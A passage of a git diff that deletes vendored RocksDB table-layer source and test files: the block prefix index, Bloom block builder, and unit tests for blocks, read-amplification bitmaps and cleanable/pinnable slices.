-Status BlockPrefixIndex::Create(const SliceTransform* internal_prefix_extractor,
-                                const Slice& prefixes, const Slice& prefix_meta,
-                                BlockPrefixIndex** prefix_index) {
-  uint64_t pos = 0;
-  auto meta_pos = prefix_meta;
-  Status s;
-  Builder builder(internal_prefix_extractor);
-
-  while (!meta_pos.empty()) {
-    uint32_t prefix_size = 0;
-    uint32_t entry_index = 0;
-    uint32_t num_blocks = 0;
-    if (!GetVarint32(&meta_pos, &prefix_size) ||
-        !GetVarint32(&meta_pos, &entry_index) ||
-        !GetVarint32(&meta_pos, &num_blocks)) {
-      s = Status::Corruption(
-          "Corrupted prefix meta block: unable to read from it.");
-      break;
-    }
-    if (pos + prefix_size > prefixes.size()) {
-      s = Status::Corruption(
-        "Corrupted prefix meta block: size inconsistency.");
-      break;
-    }
-    Slice prefix(prefixes.data() + pos, prefix_size);
-    builder.Add(prefix, entry_index, num_blocks);
-
-    pos += prefix_size;
-  }
-
-  if (s.ok() && pos != prefixes.size()) {
-    s = Status::Corruption("Corrupted prefix meta block");
-  }
-
-  if (s.ok()) {
-    *prefix_index = builder.Finish();
-  }
-
-  return s;
-}
-
-uint32_t BlockPrefixIndex::GetBlocks(const Slice& key,
-                                     uint32_t** blocks) {
-  Slice prefix = internal_prefix_extractor_->Transform(key);
-
-  uint32_t bucket = PrefixToBucket(prefix, num_buckets_);
-  uint32_t block_id = buckets_[bucket];
-
-  if (IsNone(block_id)) {
-    return 0;
-  } else if (IsBlockId(block_id)) {
-    *blocks = &buckets_[bucket];
-    return 1;
-  } else {
-    uint32_t index = DecodeIndex(block_id);
-    assert(index < num_block_array_buffer_entries_);
-    *blocks = &block_array_buffer_[index+1];
-    uint32_t num_blocks = block_array_buffer_[index];
-    assert(num_blocks > 1);
-    assert(index + num_blocks < num_block_array_buffer_entries_);
-    return num_blocks;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_prefix_index.h b/thirdparty/rocksdb/table/block_prefix_index.h
deleted file mode 100644
index dd4282d..0000000
--- a/thirdparty/rocksdb/table/block_prefix_index.h
+++ /dev/null
@@ -1,68 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <stdint.h>
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Comparator;
-class Iterator;
-class Slice;
-class SliceTransform;
-
-// Build a hash-based index to speed up the lookup for "index block".
-// BlockHashIndex accepts a key and, if found, returns its restart index within
-// that index block.
-class BlockPrefixIndex {
- public:
-
-  // Maps a key to a list of data blocks that could potentially contain
-  // the key, based on the prefix.
-  // Returns the total number of relevant blocks, 0 means the key does
-  // not exist.
-  uint32_t GetBlocks(const Slice& key, uint32_t** blocks);
-
-  size_t ApproximateMemoryUsage() const {
-    return sizeof(BlockPrefixIndex) +
-      (num_block_array_buffer_entries_ + num_buckets_) * sizeof(uint32_t);
-  }
-
-  // Create hash index by reading from the metadata blocks.
-  // @params prefixes: a sequence of prefixes.
-  // @params prefix_meta: contains the "metadata" to of the prefixes.
-  static Status Create(const SliceTransform* hash_key_extractor,
-                       const Slice& prefixes, const Slice& prefix_meta,
-                       BlockPrefixIndex** prefix_index);
-
-  ~BlockPrefixIndex() {
-    delete[] buckets_;
-    delete[] block_array_buffer_;
-  }
-
- private:
-  class Builder;
-  friend Builder;
-
-  BlockPrefixIndex(const SliceTransform* internal_prefix_extractor,
-                   uint32_t num_buckets,
-                   uint32_t* buckets,
-                   uint32_t num_block_array_buffer_entries,
-                   uint32_t* block_array_buffer)
-      : internal_prefix_extractor_(internal_prefix_extractor),
-        num_buckets_(num_buckets),
-        num_block_array_buffer_entries_(num_block_array_buffer_entries),
-        buckets_(buckets),
-        block_array_buffer_(block_array_buffer) {}
-
-  const SliceTransform* internal_prefix_extractor_;
-  uint32_t num_buckets_;
-  uint32_t num_block_array_buffer_entries_;
-  uint32_t* buckets_;
-  uint32_t* block_array_buffer_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_test.cc b/thirdparty/rocksdb/table/block_test.cc
deleted file mode 100644
index f5c5439..0000000
--- a/thirdparty/rocksdb/table/block_test.cc
+++ /dev/null
@@ -1,487 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <stdio.h>
-#include <algorithm>
-#include <set>
-#include <string>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "db/write_batch_internal.h"
-#include "db/memtable.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/table.h"
-#include "rocksdb/slice_transform.h"
-#include "table/block.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-std::string GenerateKey(int primary_key, int secondary_key, int padding_size,
-                        Random *rnd) {
-  char buf[50];
-  char *p = &buf[0];
-  snprintf(buf, sizeof(buf), "%6d%4d", primary_key, secondary_key);
-  std::string k(p);
-  if (padding_size) {
-    k += RandomString(rnd, padding_size);
-  }
-
-  return k;
-}
-
-// Generate random key value pairs.
-// The generated key will be sorted. You can tune the parameters to generated
-// different kinds of test key/value pairs for different scenario.
-void GenerateRandomKVs(std::vector<std::string> *keys,
-                       std::vector<std::string> *values, const int from,
-                       const int len, const int step = 1,
-                       const int padding_size = 0,
-                       const int keys_share_prefix = 1) {
-  Random rnd(302);
-
-  // generate different prefix
-  for (int i = from; i < from + len; i += step) {
-    // generating keys that shares the prefix
-    for (int j = 0; j < keys_share_prefix; ++j) {
-      keys->emplace_back(GenerateKey(i, j, padding_size, &rnd));
-
-      // 100 bytes values
-      values->emplace_back(RandomString(&rnd, 100));
-    }
-  }
-}
-
-class BlockTest : public testing::Test {};
-
-// block test
-TEST_F(BlockTest, SimpleTest) {
-  Random rnd(301);
-  Options options = Options();
-  std::unique_ptr<InternalKeyComparator> ic;
-  ic.reset(new test::PlainInternalKeyComparator(options.comparator));
-
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  BlockBuilder builder(16);
-  int num_records = 100000;
-
-  GenerateRandomKVs(&keys, &values, 0, num_records);
-  // add a bunch of records to a block
-  for (int i = 0; i < num_records; i++) {
-    builder.Add(keys[i], values[i]);
-  }
-
-  // read serialized contents of the block
-  Slice rawblock = builder.Finish();
-
-  // create block reader
-  BlockContents contents;
-  contents.data = rawblock;
-  contents.cachable = false;
-  Block reader(std::move(contents), kDisableGlobalSequenceNumber);
-
-  // read contents of block sequentially
-  int count = 0;
-  InternalIterator *iter = reader.NewIterator(options.comparator);
-  for (iter->SeekToFirst();iter->Valid(); count++, iter->Next()) {
-
-    // read kv from block
-    Slice k = iter->key();
-    Slice v = iter->value();
-
-    // compare with lookaside array
-    ASSERT_EQ(k.ToString().compare(keys[count]), 0);
-    ASSERT_EQ(v.ToString().compare(values[count]), 0);
-  }
-  delete iter;
-
-  // read block contents randomly
-  iter = reader.NewIterator(options.comparator);
-  for (int i = 0; i < num_records; i++) {
-
-    // find a random key in the lookaside array
-    int index = rnd.Uniform(num_records);
-    Slice k(keys[index]);
-
-    // search in block for this key
-    iter->Seek(k);
-    ASSERT_TRUE(iter->Valid());
-    Slice v = iter->value();
-    ASSERT_EQ(v.ToString().compare(values[index]), 0);
-  }
-  delete iter;
-}
-
-// return the block contents
-BlockContents GetBlockContents(std::unique_ptr<BlockBuilder> *builder,
-                               const std::vector<std::string> &keys,
-                               const std::vector<std::string> &values,
-                               const int prefix_group_size = 1) {
-  builder->reset(new BlockBuilder(1 /* restart interval */));
-
-  // Add only half of the keys
-  for (size_t i = 0; i < keys.size(); ++i) {
-    (*builder)->Add(keys[i], values[i]);
-  }
-  Slice rawblock = (*builder)->Finish();
-
-  BlockContents contents;
-  contents.data = rawblock;
-  contents.cachable = false;
-
-  return contents;
-}
-
-void CheckBlockContents(BlockContents contents, const int max_key,
-                        const std::vector<std::string> &keys,
-                        const std::vector<std::string> &values) {
-  const size_t prefix_size = 6;
-  // create block reader
-  BlockContents contents_ref(contents.data, contents.cachable,
-                             contents.compression_type);
-  Block reader1(std::move(contents), kDisableGlobalSequenceNumber);
-  Block reader2(std::move(contents_ref), kDisableGlobalSequenceNumber);
-
-  std::unique_ptr<const SliceTransform> prefix_extractor(
-      NewFixedPrefixTransform(prefix_size));
-
-  std::unique_ptr<InternalIterator> regular_iter(
-      reader2.NewIterator(BytewiseComparator()));
-
-  // Seek existent keys
-  for (size_t i = 0; i < keys.size(); i++) {
-    regular_iter->Seek(keys[i]);
-    ASSERT_OK(regular_iter->status());
-    ASSERT_TRUE(regular_iter->Valid());
-
-    Slice v = regular_iter->value();
-    ASSERT_EQ(v.ToString().compare(values[i]), 0);
-  }
-
-  // Seek non-existent keys.
-  // For hash index, if no key with a given prefix is not found, iterator will
-  // simply be set as invalid; whereas the binary search based iterator will
-  // return the one that is closest.
-  for (int i = 1; i < max_key - 1; i += 2) {
-    auto key = GenerateKey(i, 0, 0, nullptr);
-    regular_iter->Seek(key);
-    ASSERT_TRUE(regular_iter->Valid());
-  }
-}
-
-// In this test case, no two key share same prefix.
-TEST_F(BlockTest, SimpleIndexHash) {
-  const int kMaxKey = 100000;
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  GenerateRandomKVs(&keys, &values, 0 /* first key id */,
-                    kMaxKey /* last key id */, 2 /* step */,
-                    8 /* padding size (8 bytes randomly generated suffix) */);
-
-  std::unique_ptr<BlockBuilder> builder;
-  auto contents = GetBlockContents(&builder, keys, values);
-
-  CheckBlockContents(std::move(contents), kMaxKey, keys, values);
-}
-
-TEST_F(BlockTest, IndexHashWithSharedPrefix) {
-  const int kMaxKey = 100000;
-  // for each prefix, there will be 5 keys starts with it.
-  const int kPrefixGroup = 5;
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  // Generate keys with same prefix.
-  GenerateRandomKVs(&keys, &values, 0,  // first key id
-                    kMaxKey,            // last key id
-                    2,                  // step
-                    10,                 // padding size,
-                    kPrefixGroup);
-
-  std::unique_ptr<BlockBuilder> builder;
-  auto contents = GetBlockContents(&builder, keys, values, kPrefixGroup);
-
-  CheckBlockContents(std::move(contents), kMaxKey, keys, values);
-}
-
-// A slow and accurate version of BlockReadAmpBitmap that simply store
-// all the marked ranges in a set.
-class BlockReadAmpBitmapSlowAndAccurate {
- public:
-  void Mark(size_t start_offset, size_t end_offset) {
-    assert(end_offset >= start_offset);
-    marked_ranges_.emplace(end_offset, start_offset);
-  }
-
-  // Return true if any byte in this range was Marked
-  bool IsPinMarked(size_t offset) {
-    auto it = marked_ranges_.lower_bound(
-        std::make_pair(offset, static_cast<size_t>(0)));
-    if (it == marked_ranges_.end()) {
-      return false;
-    }
-    return offset <= it->first && offset >= it->second;
-  }
-
- private:
-  std::set<std::pair<size_t, size_t>> marked_ranges_;
-};
-
-TEST_F(BlockTest, BlockReadAmpBitmap) {
-  uint32_t pin_offset = 0;
-  SyncPoint::GetInstance()->SetCallBack(
-    "BlockReadAmpBitmap:rnd", [&pin_offset](void* arg) {
-      pin_offset = *(static_cast<uint32_t*>(arg));
-    });
-  SyncPoint::GetInstance()->EnableProcessing();
-  std::vector<size_t> block_sizes = {
-      1,                 // 1 byte
-      32,                // 32 bytes
-      61,                // 61 bytes
-      64,                // 64 bytes
-      512,               // 0.5 KB
-      1024,              // 1 KB
-      1024 * 4,          // 4 KB
-      1024 * 10,         // 10 KB
-      1024 * 50,         // 50 KB
-      1024 * 1024,       // 1 MB
-      1024 * 1024 * 4,   // 4 MB
-      1024 * 1024 * 50,  // 10 MB
-      777,
-      124653,
-  };
-  const size_t kBytesPerBit = 64;
-
-  Random rnd(301);
-  for (size_t block_size : block_sizes) {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-    BlockReadAmpBitmap read_amp_bitmap(block_size, kBytesPerBit, stats.get());
-    BlockReadAmpBitmapSlowAndAccurate read_amp_slow_and_accurate;
-
-    size_t needed_bits = (block_size / kBytesPerBit);
-    if (block_size % kBytesPerBit != 0) {
-      needed_bits++;
-    }
-    size_t bitmap_size = needed_bits / 32;
-    if (needed_bits % 32 != 0) {
-      bitmap_size++;
-    }
-
-    ASSERT_EQ(stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES), block_size);
-
-    // Generate some random entries
-    std::vector<size_t> random_entry_offsets;
-    for (int i = 0; i < 1000; i++) {
-      random_entry_offsets.push_back(rnd.Next() % block_size);
-    }
-    std::sort(random_entry_offsets.begin(), random_entry_offsets.end());
-    auto it =
-        std::unique(random_entry_offsets.begin(), random_entry_offsets.end());
-    random_entry_offsets.resize(
-        std::distance(random_entry_offsets.begin(), it));
-
-    std::vector<std::pair<size_t, size_t>> random_entries;
-    for (size_t i = 0; i < random_entry_offsets.size(); i++) {
-      size_t entry_start = random_entry_offsets[i];
-      size_t entry_end;
-      if (i + 1 < random_entry_offsets.size()) {
-        entry_end = random_entry_offsets[i + 1] - 1;
-      } else {
-        entry_end = block_size - 1;
-      }
-      random_entries.emplace_back(entry_start, entry_end);
-    }
-
-    for (size_t i = 0; i < random_entries.size(); i++) {
-      auto &current_entry = random_entries[rnd.Next() % random_entries.size()];
-
-      read_amp_bitmap.Mark(static_cast<uint32_t>(current_entry.first),
-                           static_cast<uint32_t>(current_entry.second));
-      read_amp_slow_and_accurate.Mark(current_entry.first,
-                                      current_entry.second);
-
-      size_t total_bits = 0;
-      for (size_t bit_idx = 0; bit_idx < needed_bits; bit_idx++) {
-        total_bits += read_amp_slow_and_accurate.IsPinMarked(
-          bit_idx * kBytesPerBit + pin_offset);
-      }
-      size_t expected_estimate_useful = total_bits * kBytesPerBit;
-      size_t got_estimate_useful =
-        stats->getTickerCount(READ_AMP_ESTIMATE_USEFUL_BYTES);
-      ASSERT_EQ(expected_estimate_useful, got_estimate_useful);
-    }
-  }
-  SyncPoint::GetInstance()->DisableProcessing();
-  SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-TEST_F(BlockTest, BlockWithReadAmpBitmap) {
-  Random rnd(301);
-  Options options = Options();
-  std::unique_ptr<InternalKeyComparator> ic;
-  ic.reset(new test::PlainInternalKeyComparator(options.comparator));
-
-  std::vector<std::string> keys;
-  std::vector<std::string> values;
-  BlockBuilder builder(16);
-  int num_records = 10000;
-
-  GenerateRandomKVs(&keys, &values, 0, num_records, 1);
-  // add a bunch of records to a block
-  for (int i = 0; i < num_records; i++) {
-    builder.Add(keys[i], values[i]);
-  }
-
-  Slice rawblock = builder.Finish();
-  const size_t kBytesPerBit = 8;
-
-  // Read the block sequentially using Next()
-  {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    // create block reader
-    BlockContents contents;
-    contents.data = rawblock;
-    contents.cachable = true;
-    Block reader(std::move(contents), kDisableGlobalSequenceNumber,
-                 kBytesPerBit, stats.get());
-
-    // read contents of block sequentially
-    size_t read_bytes = 0;
-    BlockIter *iter = static_cast<BlockIter *>(
-        reader.NewIterator(options.comparator, nullptr, true, stats.get()));
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      iter->value();
-      read_bytes += iter->TEST_CurrentEntrySize();
-
-      double semi_acc_read_amp =
-          static_cast<double>(read_bytes) / rawblock.size();
-      double read_amp = static_cast<double>(stats->getTickerCount(
-                            READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-                        stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      // Error in read amplification will be less than 1% if we are reading
-      // sequentially
-      double error_pct = fabs(semi_acc_read_amp - read_amp) * 100;
-      EXPECT_LT(error_pct, 1);
-    }
-
-    delete iter;
-  }
-
-  // Read the block sequentially using Seek()
-  {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    // create block reader
-    BlockContents contents;
-    contents.data = rawblock;
-    contents.cachable = true;
-    Block reader(std::move(contents), kDisableGlobalSequenceNumber,
-                 kBytesPerBit, stats.get());
-
-    size_t read_bytes = 0;
-    BlockIter *iter = static_cast<BlockIter *>(
-        reader.NewIterator(options.comparator, nullptr, true, stats.get()));
-    for (int i = 0; i < num_records; i++) {
-      Slice k(keys[i]);
-
-      // search in block for this key
-      iter->Seek(k);
-      iter->value();
-      read_bytes += iter->TEST_CurrentEntrySize();
-
-      double semi_acc_read_amp =
-          static_cast<double>(read_bytes) / rawblock.size();
-      double read_amp = static_cast<double>(stats->getTickerCount(
-                            READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-                        stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      // Error in read amplification will be less than 1% if we are reading
-      // sequentially
-      double error_pct = fabs(semi_acc_read_amp - read_amp) * 100;
-      EXPECT_LT(error_pct, 1);
-    }
-    delete iter;
-  }
-
-  // Read the block randomly
-  {
-    std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-
-    // create block reader
-    BlockContents contents;
-    contents.data = rawblock;
-    contents.cachable = true;
-    Block reader(std::move(contents), kDisableGlobalSequenceNumber,
-                 kBytesPerBit, stats.get());
-
-    size_t read_bytes = 0;
-    BlockIter *iter = static_cast<BlockIter *>(
-        reader.NewIterator(options.comparator, nullptr, true, stats.get()));
-    std::unordered_set<int> read_keys;
-    for (int i = 0; i < num_records; i++) {
-      int index = rnd.Uniform(num_records);
-      Slice k(keys[index]);
-
-      iter->Seek(k);
-      iter->value();
-      if (read_keys.find(index) == read_keys.end()) {
-        read_keys.insert(index);
-        read_bytes += iter->TEST_CurrentEntrySize();
-      }
-
-      double semi_acc_read_amp =
-          static_cast<double>(read_bytes) / rawblock.size();
-      double read_amp = static_cast<double>(stats->getTickerCount(
-                            READ_AMP_ESTIMATE_USEFUL_BYTES)) /
-                        stats->getTickerCount(READ_AMP_TOTAL_READ_BYTES);
-
-      double error_pct = fabs(semi_acc_read_amp - read_amp) * 100;
-      // Error in read amplification will be less than 2% if we are reading
-      // randomly
-      EXPECT_LT(error_pct, 2);
-    }
-    delete iter;
-  }
-}
-
-TEST_F(BlockTest, ReadAmpBitmapPow2) {
-  std::shared_ptr<Statistics> stats = rocksdb::CreateDBStatistics();
-  ASSERT_EQ(BlockReadAmpBitmap(100, 1, stats.get()).GetBytesPerBit(), 1);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 2, stats.get()).GetBytesPerBit(), 2);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 4, stats.get()).GetBytesPerBit(), 4);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 8, stats.get()).GetBytesPerBit(), 8);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 16, stats.get()).GetBytesPerBit(), 16);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 32, stats.get()).GetBytesPerBit(), 32);
-
-  ASSERT_EQ(BlockReadAmpBitmap(100, 3, stats.get()).GetBytesPerBit(), 2);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 7, stats.get()).GetBytesPerBit(), 4);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 11, stats.get()).GetBytesPerBit(), 8);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 17, stats.get()).GetBytesPerBit(), 16);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 33, stats.get()).GetBytesPerBit(), 32);
-  ASSERT_EQ(BlockReadAmpBitmap(100, 35, stats.get()).GetBytesPerBit(), 32);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char **argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/bloom_block.cc b/thirdparty/rocksdb/table/bloom_block.cc
deleted file mode 100644
index 6195903..0000000
--- a/thirdparty/rocksdb/table/bloom_block.cc
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/bloom_block.h"
-
-#include <string>
-#include "rocksdb/slice.h"
-#include "util/dynamic_bloom.h"
-
-namespace rocksdb {
-
-void BloomBlockBuilder::AddKeysHashes(const std::vector<uint32_t>& keys_hashes) {
-  for (auto hash : keys_hashes) {
-    bloom_.AddHash(hash);
-  }
-}
-
-Slice BloomBlockBuilder::Finish() { return bloom_.GetRawData(); }
-
-const std::string BloomBlockBuilder::kBloomBlock = "kBloomBlock";
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/bloom_block.h b/thirdparty/rocksdb/table/bloom_block.h
deleted file mode 100644
index 9ff610b..0000000
--- a/thirdparty/rocksdb/table/bloom_block.h
+++ /dev/null
@@ -1,38 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <vector>
-#include <string>
-#include "util/dynamic_bloom.h"
-
-namespace rocksdb {
-class Logger;
-
-class BloomBlockBuilder {
- public:
-  static const std::string kBloomBlock;
-
-  explicit BloomBlockBuilder(uint32_t num_probes = 6)
-      : bloom_(num_probes, nullptr) {}
-
-  void SetTotalBits(Allocator* allocator, uint32_t total_bits,
-                    uint32_t locality, size_t huge_page_tlb_size,
-                    Logger* logger) {
-    bloom_.SetTotalBits(allocator, total_bits, locality, huge_page_tlb_size,
-                        logger);
-  }
-
-  uint32_t GetNumBlocks() const { return bloom_.GetNumBlocks(); }
-
-  void AddKeysHashes(const std::vector<uint32_t>& keys_hashes);
-
-  Slice Finish();
-
- private:
-  DynamicBloom bloom_;
-};
-
-};  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/cleanable_test.cc b/thirdparty/rocksdb/table/cleanable_test.cc
deleted file mode 100644
index f18c33b..0000000
--- a/thirdparty/rocksdb/table/cleanable_test.cc
+++ /dev/null
@@ -1,277 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <functional>
-
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/iostats_context.h"
-#include "rocksdb/perf_context.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class CleanableTest : public testing::Test {};
-
-// Use this to keep track of the cleanups that were actually performed
-void Multiplier(void* arg1, void* arg2) {
-  int* res = reinterpret_cast<int*>(arg1);
-  int* num = reinterpret_cast<int*>(arg2);
-  *res *= *num;
-}
-
-// the first Cleanup is on stack and the rest on heap, so test with both cases
-TEST_F(CleanableTest, Register) {
-  int n2 = 2, n3 = 3;
-  int res = 1;
-  { Cleanable c1; }
-  // ~Cleanable
-  ASSERT_EQ(1, res);
-
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-    c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-
-  // Test the Reset does cleanup
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-    c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-    c1.Reset();
-    ASSERT_EQ(6, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-
-  // Test Clenable is usable after Reset
-  res = 1;
-  {
-    Cleanable c1;
-    c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-    c1.Reset();
-    ASSERT_EQ(2, res);
-    c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-}
-
-// the first Cleanup is on stack and the rest on heap,
-// so test all the combinations of them
-TEST_F(CleanableTest, Delegation) {
-  int n2 = 2, n3 = 3, n5 = 5, n7 = 7;
-  int res = 1;
-  {
-    Cleanable c2;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.DelegateCleanupsTo(&c2);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    {
-      Cleanable c1;
-      c1.DelegateCleanupsTo(&c2);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(1, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-      c1.DelegateCleanupsTo(&c2);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(6, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-      c1.DelegateCleanupsTo(&c2);                 // res = 2 * 3 * 5;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(30, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    c2.RegisterCleanup(Multiplier, &res, &n7);  // res = 5 * 7;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.RegisterCleanup(Multiplier, &res, &n3);  // res = 2 * 3;
-      c1.DelegateCleanupsTo(&c2);                 // res = 2 * 3 * 5 * 7;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(210, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    c2.RegisterCleanup(Multiplier, &res, &n7);  // res = 5 * 7;
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      c1.DelegateCleanupsTo(&c2);                 // res = 2 * 5 * 7;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(70, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    c2.RegisterCleanup(Multiplier, &res, &n7);  // res = 5 * 7;
-    {
-      Cleanable c1;
-      c1.DelegateCleanupsTo(&c2);  // res = 5 * 7;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(35, res);
-
-  res = 1;
-  {
-    Cleanable c2;
-    c2.RegisterCleanup(Multiplier, &res, &n5);  // res = 5;
-    {
-      Cleanable c1;
-      c1.DelegateCleanupsTo(&c2);  // res = 5;
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);
-  }
-  // ~Cleanable
-  ASSERT_EQ(5, res);
-}
-
-static void ReleaseStringHeap(void* s, void*) {
-  delete reinterpret_cast<const std::string*>(s);
-}
-
-class PinnableSlice4Test : public PinnableSlice {
- public:
-  void TestStringIsRegistered(std::string* s) {
-    ASSERT_TRUE(cleanup_.function == ReleaseStringHeap);
-    ASSERT_EQ(cleanup_.arg1, s);
-    ASSERT_EQ(cleanup_.arg2, nullptr);
-    ASSERT_EQ(cleanup_.next, nullptr);
-  }
-};
-
-// Putting the PinnableSlice tests here due to similarity to Cleanable tests
-TEST_F(CleanableTest, PinnableSlice) {
-  int n2 = 2;
-  int res = 1;
-  const std::string const_str = "123";
-
-  {
-    res = 1;
-    PinnableSlice4Test value;
-    Slice slice(const_str);
-    value.PinSlice(slice, Multiplier, &res, &n2);
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  {
-    res = 1;
-    PinnableSlice4Test value;
-    Slice slice(const_str);
-    {
-      Cleanable c1;
-      c1.RegisterCleanup(Multiplier, &res, &n2);  // res = 2;
-      value.PinSlice(slice, &c1);
-    }
-    // ~Cleanable
-    ASSERT_EQ(1, res);  // cleanups must have be delegated to value
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-  // ~Cleanable
-  ASSERT_EQ(2, res);
-
-  {
-    PinnableSlice4Test value;
-    Slice slice(const_str);
-    value.PinSelf(slice);
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-
-  {
-    PinnableSlice4Test value;
-    std::string* self_str_ptr = value.GetSelf();
-    self_str_ptr->assign(const_str);
-    value.PinSelf();
-    std::string str;
-    str.assign(value.data(), value.size());
-    ASSERT_EQ(const_str, str);
-  }
-}
-
